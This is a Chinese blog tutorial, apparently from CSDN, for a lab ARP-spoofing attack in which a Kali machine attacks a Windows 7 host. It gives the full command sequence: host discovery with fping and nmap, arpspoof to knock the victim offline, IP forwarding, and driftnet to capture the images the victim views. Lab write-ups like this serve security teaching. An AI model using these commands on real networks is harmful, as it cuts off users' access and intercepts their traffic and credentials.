渗透测试实战之ARP欺骗攻击(ARP断网攻击)

已于 2023-12-14 15:52:57 修改
阅读量317 收藏 1
点赞数 6
文章标签: 网络
于 2023-12-14 15:51:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CBNBC/article/details/134990244
版权

目录:

一、实验环境准备:

1.攻击机:kali

2.受害机:win7

3.获取Kali和win7的IP,将二者的网络连接模式都设置为NAT模式,并保证kali和win7在同一局域网下,可以相互ping通

二、实验大体步骤

三、具体实验步骤

(一)获取win7的MAC地址和网关地址

​编辑

(二)获取kali的IP和网关地址

(三)主机扫描

方法一:fping

方法二:nmap

(四)arp欺骗

4-1

4-2

4-3

4-4

网卡名在这里:

(五)断网攻击

(六)攻击利用1:内网截获图片

6-1 设置ip流量转发

6-2 ARP欺骗前,检查win7是否能够上网:

6-3 捕获win7正在浏览的图片

1)http://a.aixjt.com/AdminPublic.html

2)http://yqbz.xnayw.cn/gn.html

3)http://www.win4000.com/

一、实验环境准备:

1.攻击机:kali

2.受害机:win7

3.获取Kali和win7的IP,将二者的网络连接模式都设置为NAT模式,并保证kali和win7在同一局域网下,可以相互ping通

二、实验大体步骤

1. 对目标主机进行ARP欺骗,声称自己是网关。

2. 转发目标的NAT数据到网关,维持目标的外出数据。

3. 对网关进行ARP欺骗,声称自己是目标主机。

4. 转发网关的NAT数据到目标主机,维持目标的接收数据。

5. 监听劫持或者修改目标的进入和外出数据,从而实现攻击。

三、具体实验步骤

(一)获取win7的MAC地址和网关地址

ipconfig /all

arp -a

(二)获取kali的IP和网关地址

ifconfig

(三)主机扫描

方法一:fping

执行ping扫描最简单的方法是使用工具fping,fping使用ICMP ECHO一次请求多个主机,对当前局域网还存在那些主机进行快速扫描,以确定要攻击的主机的ip地址。

#fping -a -g 需要扫描的网段 >(将扫描结果覆盖到result文件中) 自定义文件名
fping -a -g 192.168.37.0/24 > result

#使用fping工具扫描了192.168.37.0/24网段内的所有主机,并将扫描结果输出到result文件中。其中,-a参数表示只输出活动的主机,-g参数表示扫描整个网段。

cat result

得到这个,我们再排除kali的IP和网关,剩下的就是win7的IP和网关,分别是192.168.37.130,192.168.37.2

方法二:nmap
nmap -sP 192.168.37.0/24

执行nmap -sP 192.168.254.0/24,扫描网络中活跃的主机。(推荐使用)

-sP 选项表示只利用ping扫描进行主机发现,不进行端口扫描

-sS 进行TCP的半开放扫描,如果禁ping的时候可以使用这个参数

注:用nmap进行主机扫描速度快,而且能穿透防火墙,是比较可靠的扫描工具。

(四)arp欺骗

arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。

注意:

运行 arpspoof 命令时提示:arpspoof未找到命令,其原因是你还未安装 arpspoof 工具;

arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff :使用以下命令安装dsniff:apt-get install dsniff

4-1

更换更新源为阿里云,原有的更新源加#号注释

vim /etc/apt/sources.list
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
4-2

修改完成后执行apt-get update命令完成更新

apt-get update
4-3

重新安装命令

apt-get install dsniff
4-4

arp欺骗:

命令格式:arpspoof  -h  #查看arpspoof版本信息
-i 后面的参数是网卡名称
-t 后面的参数是目的主机和网关,截获目的主机发往网关的数据包

网卡名在这里:

(五)断网攻击

arpspoof -i eth0 -t 192.168.37.130 192.168.37.2

1.先去win7 ping百度

ping www.baidu.com -t
#-t表示一直连续的ping

开始ping是正常的:

返回kali,进行断网攻击:

再返回win7查看,发现请求超时:

2.查看win7的网关MAC地址

攻击前:

攻击后:

发现已经改成kali的了

3.正常情况下,win7也是不能上网的了,会一直显示正在连接:

(六)攻击利用1:内网截获图片

Arp欺骗:目标ip的流量经过我的网卡,从网关出去。

Arp断网:目标ip的流量经过我的网卡,就只是单纯经过,没有出去。

6-1 设置ip流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

#显示1就对了

注意:执行这条命令不要终止断网攻击,单独再打开一个终端界面即可

1为转发流量的意思。

有时不能这样直接修改,还有另外一种方法

修改/etc/sysctl.conf文件,使得net.ipv4.ip_forward = 1;等于0为不转发。然后更新使用命令 sysctl -p

6-2 ARP欺骗前,检查win7是否能够上网:

正常上网:

那么此时,win7和网关通信的数据包都会流经kali

6-3 捕获win7正在浏览的图片

命令:

driftnet -i eth0

Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序,但

只能抓取http协议网址下的图片,可以使用以下测试网站:

1)http://a.aixjt.com/AdminPublic.html

你会发现这个网页上的图片(比如那个验证码的图片)都被kali捕获到了

2)http://yqbz.xnayw.cn/gn.html

这些图标也全部被kali捕获了

3)http://www.win4000.com/

这个我404了,估计是网络问题,大家可以自己试试。

热心市民老八
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
ARP +欺骗 攻击(较麻烦,是为了理解原理做的实验)
2301_80361487的博客
01-21 1130
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。执行ping扫描最简单的方法是使用工具fping,fping使用ICMP ECHO一次请求多个主机,对当前局域还存在那些主机进行快速扫描,以确定要攻击的主机的ip地址。在kali终端中,输入命令“ifconfig”,查看kali的IP地址与MAC地址,如图所示。
ensp加kali实现arp欺骗攻击
04-21
使用arpspoof实现流量窃取与攻击
渗透测试实战ARP欺骗攻击ARP攻击和流量转发)
z_s_s_f的博客
12-17 2981
抓取图片以及http、https协议的用户名和密码,使用arpspoof、sslstrip、driftnet和ettercap这四个工具他们的关系与执行顺序是什么样的。
w13渗透测试实战ARP欺骗攻击ARP攻击
三旬的博客
12-18 1009
步骤5:arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。方法1:执行ping扫描最简单的方法是使用工具fping,fping使用ICMP ECHO一次请求多个主机,对当前局域还存在那些主机进行快速扫描,以确定要攻击的主机的ip地址。步骤2:在kali终端中,输入命令“ifconfig”,查看kali的IP地址与MAC地址,如图所示。
渗透测试实战之DNS欺骗攻击
z_s_s_f的博客
12-17 1378
3.输入vim /etc/ettercap/etter.dns ,在配置文件下输入*.com A 192.168.88.129(这是把所有以.com结尾的域名都映射为对应攻击者的ip,在攻击机做中间人后,目标机先访问这里的dns)(A代表ipv4,AAA代表ipv6)ettercap工具下方也有欺骗记录。7.点击1下的2,即可进行arp欺骗了(感觉这个工具不能造成,始终能使目标机连,但是攻击机已经做了一个中间人)1.首先,确定目标机的ip和关,攻击机要先冒充目标机的关,对目标机进行arp欺骗
中间人攻击ARP欺骗
YJ_12340的博客
09-08 2805
​​​。
ARP欺骗攻击实操
weixin_72543266的博客
09-30 665
本篇是在学习第一阶段理论知识的最后一节课的实战操作,其中讲到了两种欺骗操作,这是其一,另一种是DNS欺骗操作,看自己有时间进行操作了本篇文章是对学习ARP欺骗实例的一次实际操作,对于学习实战挖洞前的最后一次实战操作,去熟悉渗透测试进行的一次操作吧,对于自己来说也算是一种突破.每日一言悄悄地想你,波澜不惊。
ARP欺骗、DNS攻击与无线内渗透
Dagger_S的博客
08-21 653
本文包含无线内的密码暴力破解、内arp欺骗与监听、DNS欺骗攻击
局域arp攻击_络安全工程师教Kali Linux:ARP欺骗概述
weixin_39639643的博客
10-24 141
课前声明:本分享仅做学习交流,请自觉遵守法律法规!搜索:Kali与编程,学习更多络攻防干货!本节课中你将了解到:ARP欺骗的用处什么是ARP演示如何通信ARP欺骗原理一、ARP欺骗的用处ARP欺骗,作为中间人攻击手段中的一种,一是可以实现对局域中用户的攻击(PS:天要使其灭亡,必先使其),二是可以获取到受害用户的数据流量包括浏览的站,图片,甚至账号密码(PS:想想还是有点恐怖的!),...
安全测试(四) Wi-Fi安全 渗透测试 络安全 公共场的免费Wi-Fi真的安全吗?个人信息被监控窃听风险 如: ARP攻击 SSL攻击 DNS安全 加密方式等 枚举实战应用案例 信息窃听获取
Benjamin CSDN博客
12-28 6935
安全测试(四) Wi-Fi安全 渗透测试 络安全 公共场的免费Wi-Fi真的安全吗?个人信息被监控窃听风险 如: ARP攻击 SSL攻击 DNS安全 加密方式等 枚举实战应用案例 信息窃听获取 3、Wi-FI安全攻击测试原理说明 3.1络连接正常检查 3.2二次访问验证 3.3 ARP攻击(Address Resolution Protocol) 3.3.1 APR攻击 简介 3.3.2ARP攻击 危害 3.3.3ARP攻击 检测
易语言ARP欺骗攻击
08-20
易语言ARP欺骗攻击源码系统结构:随机MAC,获取MAC,探测停止,ARP欺骗,Ping探测,自定义ARP,API_SendARP,API_inet_addr, ======程序集1 || ||------_启动子程序 || || ======窗口程序集1 || ||------_DLL_局域_创建
局域ARP攻击是什么 局域ARP攻击的解决方法
10-01
经常遭受到一些ARP攻击,另外一些电脑用户的电脑也时候会遭受APR攻击,下面为大家介绍下ARP攻击是什么以及ARP攻击解决办法
一种新思路的ARP欺骗攻击的防范
01-19
例如很多企事业管员经常收到员工抱怨无法访问互联,经过故障排查后,发现客户端PC上缓存的ARP绑定条目是错误的,从此现象可以判络中可能出现ARP欺骗攻击,导致客户端PC不能获取正确的ARP条目,以致不能...
Wireshark TS | 应用传输丢包问题
7ACE的博客
06-09 753
Wireshark TS | 应用传输丢包问题
络安全技术实验一 信息收集和漏洞扫描
zzzfff__的博客
06-09 986
了解信息搜集和漏洞扫描的一般步骤,利用Nmap等工具进行信息搜集并进行综合分析;掌握TCP全连接扫描、TCP SYN扫描的原理,利用Scapy编写络应用程序,开发端口扫描功能模块;使用漏洞扫描工具发现漏洞并进行渗透测试
工业关在智能制造中的具体应用和效果-天拓四方
最新发布
2401_84969963的博客
06-14 525
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不进步和应用场景的拓展,工业关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
cs61C | lecture4
DaphneOdera17的博客
06-10 671
## Stack在最顶部,向下增长。包含局部变量和 function frame information。栈指针(SP, Stack Pointer) 告诉我们最低(当前)stack frame 在哪里。当进程结束时,SP 会移动回之前的位置,但是数据会保留(现在变成 garbage)。```ca(0);return 1;b(1);c(2);d(4);```!!以下错误代码:```cint y;y = 3;return &y;/* 3 *//*?*/
络编程之XDP技术应用
fpcc的专栏
06-10 832
在上文中介绍了XDP技术,XDP技术的基本原理已经明白,但有一个问题,一个技术如何落地,如何在实际中应用?这就需要有一个承载其的具体的形式。举一个例子,络编程一般使用Socket方式,那么能不能够在这种方式里使用XDP技术呢?答案是肯定的。 Linux在内核中提供了AF_XDP套接字编程,这就意味着,大部分的编程方式仍然可以以原来的套接字编程为主。这样的好处显而易见,对开发者和维护者来说,都是相对要容易理解和支持。AF_XDP类似于AF_NET(TCP/IP等)等一样,是一个协议族,大家有没有记得在TCP
arp欺骗攻击区别
07-27
ARP欺骗(Address Resolution Protocol spoofing)和攻击是两种不同类型的攻击ARP欺骗是一种利用ARP协议的漏洞来欺骗络中其他设备的攻击方式。在一个以太中,设备通过ARP协议将IP地址映射到MAC地址,以便进行通信。攻击者可以发送伪造的ARP响应消息,将自己的MAC地址与目标IP地址进行映射,从而欺骗络中的其他设备将数据发送到攻击者的设备上。这样,攻击者可以窃取通信数据、进行中间人攻击等。 攻击是一种使目标设备无法正常访问络的攻击方式。攻击者可以通过多种手段实现攻击,比如发送大量无效数据包、使用络拥塞、发起拒绝服务(DoS)攻击等。这些攻击会导致目标设备无法正常接收或发送络数据,从而使其与开连接。 总结来说,ARP欺骗是一种通过欺骗其他设备来窃取通信数据的攻击方式,而攻击是一种通过各种手段使目标设备与开连接的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值